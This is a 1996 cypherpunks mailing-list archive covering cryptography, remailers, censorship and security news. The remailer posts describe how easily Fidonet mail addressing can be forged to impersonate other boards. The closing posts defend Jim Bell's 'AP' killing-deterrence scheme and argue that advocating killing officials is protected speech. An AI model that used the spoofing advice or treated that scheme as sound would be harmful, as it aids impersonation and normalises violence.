IisoKnUvNCklMik7DQo8L3ByZT4NCg0KPHA+DQpUbyB0aGluayB0aGF0IG1v
ZGVybiBwcm9ncmFtbWVycyB3b3VsZCB0cnkgdG8gdXNlIGEgbGFuZ3VhZ2Ug
dGhhdA0KYWxsb3dlZCBzdWNoIGEgc3RhdGVtZW50IHdhcyBiZXlvbmQgb3Vy
IGNvbXByZWhlbnNpb24hICBXZSBhY3R1YWxseQ0KdGhvdWdodCBvZiBzZWxs
aW5nIHRoaXMgdG8gdGhlIFNvdmlldHMgdG8gc2V0IHRoZWlyIGNvbXB1dGVy
IHNjaWVuY2UNCnByb2dyZXNzIGJhY2sgMjAgb3IgbW9yZSB5ZWFycy4gSW1h
Z2luZSBvdXIgc3VycHJpc2Ugd2hlbiBBVCZhbXA7VCBhbmQNCm90aGVyIFVT
IGNvcnBvcmF0aW9ucyBhY3R1YWxseSBiZWdhbiB0cnlpbmcgdG8gdXNlIFVu
aXggYW5kIEMhICBJdCBoYXMNCnRha2VuIHRoZW0gMjAgeWVhcnMgdG8gZGV2
ZWxvcCBlbm91Z2ggZXhwZXJ0aXNlIHRvIGdlbmVyYXRlIGV2ZW4NCm1hcmdp
bmFsbHkgdXNlZnVsIGFwcGxpY2F0aW9ucyB1c2luZyB0aGlzIDE5NjAncyB0
ZWNobm9sb2dpY2FsIHBhcm9keSwNCmJ1dCB3ZSBhcmUgaW1wcmVzc2VkIHdp
dGggdGhlIHRlbmFjaXR5IChpZiBub3QgY29tbW9uIHNlbnNlKSBvZiB0aGUN
CmdlbmVyYWwgVW5peCBhbmQgQyBwcm9ncmFtbWVyLiAgSW4gYW55IGV2ZW50
LCBCcmlhbiwgRGVubmlzIGFuZCBJIGhhdmUNCmJlZW4gd29ya2luZyBleGNs
dXNpdmVseSBpbiBQYXNjYWwgb24gdGhlIEFwcGxlIE1hY2ludG9zaCBmb3Ig
dGhlIHBhc3QNCmZldyB5ZWFycyBhbmQgZmVlbCByZWFsbHkgZ3VpbHR5IGFi
b3V0IHRoZSBjaGFvcywgY29uZnVzaW9uIGFuZCB0cnVseQ0KYmFkIHByb2dy
YW1taW5nIHRoYXQgaGF2ZSByZXN1bHRlZCBmcm9tIG91ciBzaWxseSBwcmFu
ayBzbyBsb25nIGFnby4nJw0KPC9wPg0KDQo8cD4NCk1ham9yIFVuaXggYW5k
IEMgdmVuZG9ycyBhbmQgY3VzdG9tZXJzLCBpbmNsdWRpbmcgQVQmYW1wO1Qs
IE1pY3Jvc29mdCwNCkhld2xldHQtUGFja2FyZCwgR1RFLCBOQ1IsIGFuZCBE
RUMgaGF2ZSByZWZ1c2VkIGNvbW1lbnQgYXQgdGhpcyB0aW1lLg0KQm9ybGFu
ZCBJbnRlcm5hdGlvbmFsLCBhIGxlYWRpbmcgdmVuZG9yIG9mIFBhc2NhbCBh
bmQgQyB0b29scywNCmluY2x1ZGluZyB0aGUgcG9wdWxhciBUdXJibyBQYXNj
YWwsIFR1cmJvIEMgYW5kIFR1cmJvIEMrKywgc3RhdGVkDQp0aGV5IGhhZCBz
dXNwZWN0ZWQgdGhpcyBmb3IgYSBudW1iZXIgb2YgeWVhcnMgYW5kIHdvdWxk
IGNvbnRpbnVlIHRvDQplbmhhbmNlIHRoZWlyIFBhc2NhbCBwcm9kdWN0cyBh
bmQgaGFsdCBmdXJ0aGVyIGVmZm9ydHMgdG8gZGV2ZWxvcCBDLg0KQW4gSUJN
IHNwb2tlc21hbiBicm9rZSBpbnRvIHVuY29udHJvbGxlZCBsYXVnaHRlciBh
bmQgaGFkIHRvIHBvc3Rwb25lDQphIGhhc3RpbHkgY29udmVuZWQgbmV3cyBj
b25mZXJlbmNlIGNvbmNlcm5pbmcgdGhlIGZhdGUgb2YgdGhlIFJTLTYwMDAs
DQptZXJlbHkgc3RhdGluZyBgVk0gd2lsbCBiZSBhdmFpbGFibGUgUmVhbCBT
b29uIE5vdycuICBJbiBhIGNyeXB0aWMNCnN0YXRlbWVudCwgUHJvZmVzc29y
IFdpcnRoIG9mIHRoZSBFVEggaW5zdGl0dXRlIGFuZCBmYXRoZXIgb2YgdGhl
DQpQYXNjYWwsIE1vZHVsYSAyIGFuZCBPYmVyb24gc3RydWN0dXJlZCBsYW5n
dWFnZXMsIG1lcmVseSBzdGF0ZWQgdGhhdA0KUC4gVC4gQmFybnVtIHdhcyBj
b3JyZWN0Lg0KPC9wPg0KDQo8cD4NCkluIGEgcmVsYXRlZCBsYXRlLWJyZWFr
aW5nIHN0b3J5LCB1c3VhbGx5IHJlbGlhYmxlIHNvdXJjZXMgYXJlIHN0YXRp
bmcNCnRoYXQgYSBzaW1pbGFyIGNvbmZlc3Npb24gbWF5IGJlIGZvcnRoY29t
aW5nIGZyb20gV2lsbGlhbSBHYXRlcw0KY29uY2VybmluZyB0aGUgTVMtRE9T
IGFuZCBXaW5kb3dzIG9wZXJhdGluZyBlbnZpcm9ubWVudHMuICBBbmQgSUJN
DQpzcG9rZXNtYW4gaGF2ZSBiZWd1biBkZW55aW5nIHRoYXQgdGhlIFZpcnR1
YWwgTWFjaGluZSAoVk0pIHByb2R1Y3QgaXMNCmFuIGludGVybmFsIHByYW5r
IGdvbmUgYXdyeS4NCjwvcD4NCg0KPGhyPg0KPGFkZHJlc3M+PGEgaHJlZj0i
L2Fmcy9jcy91c3IvY2hyaXNsZWUvd3d3L2hvbWUuaHRtbCI+Q2hyaXN0b3Bo
ZXIgTGVlIHwgY2hyaXNsZWVAcmkuY211LmVkdTwvYT48L2FkZHJlc3M+DQo8
IS0tIGhobXRzIHN0YXJ0IC0tPg0KTGFzdCBtb2RpZmllZDogTW9uIE9jdCAx
NyAxMjo0ODoyMSAxOTk0DQo8IS0tIGhobXRzIGVuZCAtLT4NCjwvYm9keT4g
PC9odG1sPg0KDQoNCi0tenp6ejQwODI4NGNiMjBiYzYzNDZpby1vbmxpbmUu
Y296enp6LS0NCg0KDQoNCg==
--Boundary..3942.1071713584.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:40:05 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Clipper III analysis
Message-ID: <199606070509.WAA20971@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Thu, 06 Jun 96 16:51:18 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Fwd: Re: Clipper III analysis
>

==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Thu, 30 May 96 01:16:32 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Clipper III analysis
>

On 29 May 1996 14:53:30 pdt, tcmay@got.net wrote:

>>        A good Questioned Document Examiner will be able to demonstrate
>>        that the signed document in question was not authored by Joe
>>        Blow, even if it contains his digital signature.
>
>I was of course talking about digital signatures, not handwritten signatures.
>
>I would be very interested to hear how a "Questioned Document Examiner" can
>possibly determine that a digital signature was not applied by a particular
>person.

I believe he was referring to document analysis. By closely comparing a
questionable work 
with those of known authorship, a skilled analyst can hopefully find
enough 
[dis]similarities to say whether a document was authored by a given
person.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================


This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 19:25:32 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: subscribe cyberwire dispatch
Message-ID: <199606070508.WAA20911@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "brock@well.com" <brock@well.com>
>Date: Thu, 06 Jun 96 15:37:46 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: subscribe cyberwire dispatch
>

subscribe cyberwire dispatch

If this account belongs to an actual human, my apologies for treating you
like a mailerbot.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 22:23:55 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Idea 'bout banning the internet
Message-ID: <199606070508.WAA20922@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "jwilk@iglou.com" <jwilk@iglou.com>
>Date: Mon, 03 Jun 96 20:36:49 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Idea 'bout banning the internet
>

On 3 Jun 1996 19:48:48 pdt, jwilk@iglou.com wrote:

>What if in the future a country banned the internet and all things that had
>to deal with it (ie-  telnet, irc). It would be  the "underground" thing.
>Just a thought, it would really suck! As I think about it it is impossible
>or is it???? Hell the usa cant even ban porn let alone the whole thing. They
>could ban it like they did fizzies. Hey there making a comeback did you here
>now they have nutrasweet in them. If you know what fizzies are than your
>pretty kewl. I'm only 13 and love then they are the drink of the future!!!!
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>Blake "Pokey" Wehlage     Gaa- 3.69
><jwilk@iglou.com>         Record- 2-4-4
>Age- 13                   Final Standings- 2nd Place (Beat in Championship)
>
>President & Founder:
>                   
>Revolution Software       "I have the fastest glove in the east!"
>Profanity Software        "Hackers never stop hacking they just get caught"
>VSoft
>
>My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
>til' 8:00p, hack til' 7:00a
>Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) The Unabrower |:-)
>
>Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring
>
>Personal Quote- Mr Plow, thats my name, that name aguin is Mr. Plow 
>-Homer Simpson
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>


You know, even counting the header, your signature is longer than the
message...
BTW, I doubt most of us care about your current love life or soccer
standings. We won't 
even mention Homer Simpson...

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:47:35 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Second email address
Message-ID: <199606070508.WAA20917@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "sysop@io-online.com" <sysop@io-online.com>
>Date: Mon, 03 Jun 96 19:50:50 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Second email address
>

How much would it be to get a second email address? (Just POP access.
Doesn't even need to 
be able to send mail) That way I could have an address to send stuff like
mailing lists to.

Also: Web pages - I believe I saw something that mentioned that some
space was included 
w/the subscription. How much, and how do I access it?

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:50:05 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Class III InfoWar
Message-ID: <199606070508.WAA20926@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Sun, 02 Jun 96 18:04:15 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Class III InfoWar
>

On 2 Jun 1996 03:06:14 pdt, hal9001@panix.com wrote:

>At 21:33 -0400 6/1/96, winn@Infowar.Com wrote:
>
>
>>The article discussed the advanced information warfare techniques used by the
>>perpetrators. "According to the American National Security Agency (NSA), they
>>have penetrated computer systems using 'logic bombs' (coded devices that
>>can be
>>remotely detonated)
>
>Unless the definition has changed recently, a "logic bomb" is normally a
>piece of code in a program that is triggered when a specific event occurs
>(such as the programmer's name not appearing in a payroll file for a
>designated period of time [which might trigger a salami round off routine
>to start cutting checks 2 months after s/he is no longer working for the
>company]).

I believe that is what they were referring to. However, the press garbled
it as usual. It 
seems like the original was something like 'logic bombs' (bits of code
that can be 
triggered remotely). Probably sounded more impressive the reporter's
way...

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 22:14:23 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: [crypto] crypto-protocols for trading card gam
Message-ID: <199606070508.WAA20921@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "ogren@concentric.net" <ogren@concentric.net>
>Date: Thu, 30 May 96 02:30:30 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: [crypto] crypto-protocols for trading card gam
>

>Disadvantages:
>
>The entire integrity of the system relies on the security of the
>game company's key pair.  If the secret key is comprimised, either by
>Cards are not transferrable.  In order to make cards transferrable the
>game company must be able to invalidate cards which have been traded
>to others.  In other words if Alice wants to give a cards to Bob she
>must:
I would just have multiple validators w/separate keys. sign w/each. This
would not 
eliminate the problem but could reduce it...

>1. Contact the game company and tell them she wants to give the card
>to Bob. 2. The game company must issue a new card to Bob with a new
>serial number and with Bob's public key rather than Alice's. 3. The
>game company must invalidate Alice's old card.  Since there is no way
>that the game company can make sure all copies of the card have been
>destroyed it must create a "invalid serial number list" and have the
>players dial into that list everytime the game is played.
>
>Since step 3 is so costly to implement, I think it is unlikely that a
>cryptography-based trading card game will have tradable cards.

Much easier - with each card, store its ownership history. EACH time it
is transfered, have 
it be signed by the previous owner.  Originally, the game company signs
it as a valid card. 
On selling it, they record the purchaser's identity (email address,
etc)and seal the card 
with the company key (or set of keys - see above). Repeat as needed.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



===================END FORWARDED MESSAGE===================

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 19:54:55 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Where does your data want to go today?
Message-ID: <199606070509.WAA20975@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 May 1996 07:56:26 pdt, EALLENSMITH@ocelot.Rutgers.EDU wrote:

>From:	IN%"mclow@owl.csusm.edu"  "Marshall Clow" 29-MAY-1996 19:18:31.60
>
>>* Why encrypt before compression? If the encryption is any good, then the
>>encrypted data won't compress much at all. However, compression before
>>encryption has its own problems.
>
>	What problems does compression before encryption have? It at least
>seems to work for PGP.


The most significant would be the presence of a compression header (what
has the data 
telling how to decompress a datastream). If you leave this in (for
instance, assuming you 
were to use PKZIP (STUPID!) you would have PK as the first two bytes
EVERY TIME!) you give 
your codebreaker a HUGE advantage. You can bypass this by removing ANY
information which 
isn't message specific and standardizing on one compression method.
Alternately, you could 
use your session key to encrypt a length word and then pad the start (and
end) with a 
string of random characters.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:11:32 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Possible out-of-US remailer sites, 2nd edition
Message-ID: <199606070510.WAA20995@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: stewarts@ix.netcom.com
To: Adamsc
Date: 31 May 1996 05:28:24 pdt
Subject: Re: Possible out-of-US remailer sites, 2nd edition

>_Country/Area_  _Name_                           _Email_
>Anguilla        Cable & Wireless                 webmaster@candw.com.ai
>Anguilla	Offshore Information Services***  info@offshore.com.ai


There are a number of small countries that aren't part of the 
US/European/Chinese/Singaporean Hegemonies, where telecom is expensive
and
Fidonets and uucp are the way to get email there.  If you're willing to
pay some money to support one, you might get some real anonymity
for financially critical data.  Also, there are periodic articles
in magazines like Wired about how George Soros is wiring the Balkans;
perhaps someone there would like to make some money running remailers.

If you are willing to go that route, you can setup a Fidonet mailer VERY
easily, and send 
mail that looks like it is from any of the 36000 bulletin boards in the
nodelist. Generally 
it will be refused by a board that has a session password. However, it is
exceedingly 
unlikely that a bbs in Singapore would have a passworded session with a
bbs in Texas.  You 
could send it randomly to a BBS using the name of another random board.
However, this would 
probably be very very very UNPOPULAR, particularly if someone got nailed
because of it. It 
would be better to work it out with some sysop in a small 3rd world
country...

Alternately, if you were to run a board, it is VERY simple to fake the
addressing on a 
Fidonet mail packet...

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.



/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 7 Jun 1996 11:51:44 +0800
To: cypherpunks@toad.com
Subject: InfoSec Spin
Message-ID: <199606061713.RAA23573@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-6-96. UST: 
 
   "Businesses bypass law to fend off hackers." 
 
      In cyberspace, where hackers are finding commercial 
      computer systems easy prey, businesses are choosing to 
      hire free-lance security teams rather than involve the 
      law. A Senate subcommittee heard Wednesday from experts 
      who described how businesses, concerned over negative 
      publicity, avoid reporting hacker assaults on their 
      networked computer system. "You stop the bad guy and 
      send him to your competitor," said Dan Gelber, the 
      committee's chief counsel. 
 
      Senator Nunn asked the subcommittee staff to comment on 
      an article in this week's Sunday Times of London that 
      reported, "Cyberterrorists have amassed up to L400 
      million worldwide by threatening to wipe out computer 
      systems" belonging to banks and brokerage houses if they 
      refuse to pay a ransom. "While we can't confirm the 
      entire story," said Gelber, "it is extremely consistent 
      with what industry insiders tell us." 
 
   http://pwp.usa.pipeline.com/~jya/fendof.txt 
 
---------- 
 
   UST had two editorials June 5 on encryption: one 
   criticizing the administration's position, and another 
   defending GAK by Sally Katzen with OMB. 
 
   http://pwp.usa.pipeline.com/~jya/yeanay.txt 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 7 Jun 1996 22:13:15 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <v02140b00addc39dee500@[205.162.51.35]>
Message-ID: <199606062218.RAA22385@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:
> Duncan wrote:
> > At 10:41 PM 6/4/96 -0700, Bruce Baugh wrote:
> > >I think there's a non-trivial chance that this list could be shut down and
> > >anyone who's made interested sounds in the idea brought in to assist the
> > >police in their inquiries.
> >
> > Yeah and they busted Jack London for publishing
> >"The Assassination Bureau, Ltd".[...]
> >
> > Advocating the general practice of killing one's opponents is as legal as
> > church on a Sunday.  The War College (or is it the NDU these days) does it
> > all the time.
> 
> As long as that person is not the President of the United States (at least
> for U.S. citizens.)  This was the issue which initiated this thread, the
> implied threat made by our favorite nutcase.

Are you sure? Can you cite references? From my readings on the 1st
amendments, any general kind of speech is legal, even if it advocates
killing certain officials, including us presidents. *If* instead of
general advocacy a person gave specific orders or concrete requests to
kill the prez, then it would not be speech. Please correct me if I am
wrong. 

>From my scarce reading of jimbell, his messages were fairly abstract
and were likely just a protected speech.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:15:59 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Possible out-of-US remailer sites, 2nd edition
Message-ID: <199606070510.WAA21002@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "cypherpunks" <cypherpunks@toad.com>
>Date: Fri, 31 May 96 23:06:02 
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: PMMail 1.5 UNREGISTERED SHAREWARE
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Possible out-of-US remailer sites, 2nd edition
>

From: stewarts@ix.netcom.com
To: Adamsc
Date: 31 May 1996 05:28:24 pdt
Subject: Re: Possible out-of-US remailer sites, 2nd edition

>_Country/Area_  _Name_                           _Email_
>Anguilla        Cable & Wireless                 webmaster@candw.com.ai
>Anguilla	Offshore Information Services***  info@offshore.com.ai


There are a number of small countries that aren't part of the 
US/European/Chinese/Singaporean Hegemonies, where telecom is expensive
and
Fidonets and uucp are the way to get email there.  If you're willing to
pay some money to support one, you might get some real anonymity
for financially critical data.  Also, there are periodic articles
in magazines like Wired about how George Soros is wiring the Balkans;
perhaps someone there would like to make some money running remailers.

If you are willing to go that route, you can setup a Fidonet mailer VERY
easily, and send 
mail that looks like it is from any of the 36000 bulletin boards in the
nodelist. Generally 
it will be refused by a board that has a session password. However, it is
exceedingly 
unlikely that a bbs in Singapore would have a passworded session with a
bbs in Texas.  You 
could send it randomly to a BBS using the name of another random board.
However, this would 
probably be very very very UNPOPULAR, particularly if someone got nailed
because of it. It 
would be better to work it out with some sysop in a small 3rd world
country...

Alternately, if you were to run a board, it is VERY simple to fake the
addressing on a 
Fidonet mail packet...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 7 Jun 1996 22:53:26 +0800
To: Martin Minow <minow@apple.com>
Subject: re: Fight-Censorship Dispatch #12: CDA deathwatch, copyright update
In-Reply-To: <v02140b03addb7e62c704@[17.202.12.102]>
Message-ID: <Pine.3.89.9606061716.A1018-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cherry is a prize example of your lonely pamphleteer, though he's one
who's just plain wacky. 

Note that calling someone wacky or a loon does not equate to saying they
should be silenced. I've said many times that Cherry should not be muzzled
on Usenet.

-Declan

For more info on Fred Cherry and his lawsuit, check out my 
#5 fight-censorship dispatch at:
  http://fight-censorship.dementia.org/dl?num=2115


On Wed, 5 Jun 1996, Martin Minow wrote:

> Date: Wed, 5 Jun 1996 11:16:49 -0700
> From: Martin Minow <minow@apple.com>
> To: declan@well.com
> Cc: minow@apple.com, cypherpunks@toad.com
> Subject: re: Fight-Censorship Dispatch #12: CDA deathwatch, copyright update
> 
> In "Fight-Censorship Dispatch #12", Declan McCullagh writes about
> "everybody's favorite net.loon," Fred Cherry:
> 
> >Whatever you think of Cherry's antics, you gotta grant him one thing
> > not many people have the balls to demand that a Federal court uphold
> > their right to flame.
> 
> I suspect that Tom Payne would -- Cherry seems from your description
> to be a prize example of "the lonely pamphleteer."
> 
> It would be interesting to know what Nat Hentoff thinks of Fred.
> 
> Martin Minow
> minow@apple.com
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 7 Jun 1996 19:59:58 +0800
To: drosoff@arc.unm.edu>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <199606070059.RAA09341@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 6/6/96 +0000, Jean-Francois Avon wrote:
>On  6 Jun 96 at 11:19, jim bell wrote:
>
>
>> >>I _do_ believe, however, that the number of people unjustifiably
>> >>targeted will be rather low. <snip>  Retaliation is possible, in
>> >> that case.
>
>Sorry Jim, I did not get that at all in the past.  I assumed a 
>context where the inner workings of AP would not be well understood 
>by the population while here, you seems to indicate that everybody 
>would operate under the threat / deterrance of mutual anihilation 
>principle.

Hmmm...  sorry, I thought that was obvious.  Well, perhaps not "obvious," 
but it's one of those facts that will become second nature to people once AP 
starts up.  


>A argued that an impulsive guy might target somebody unjustifiably 
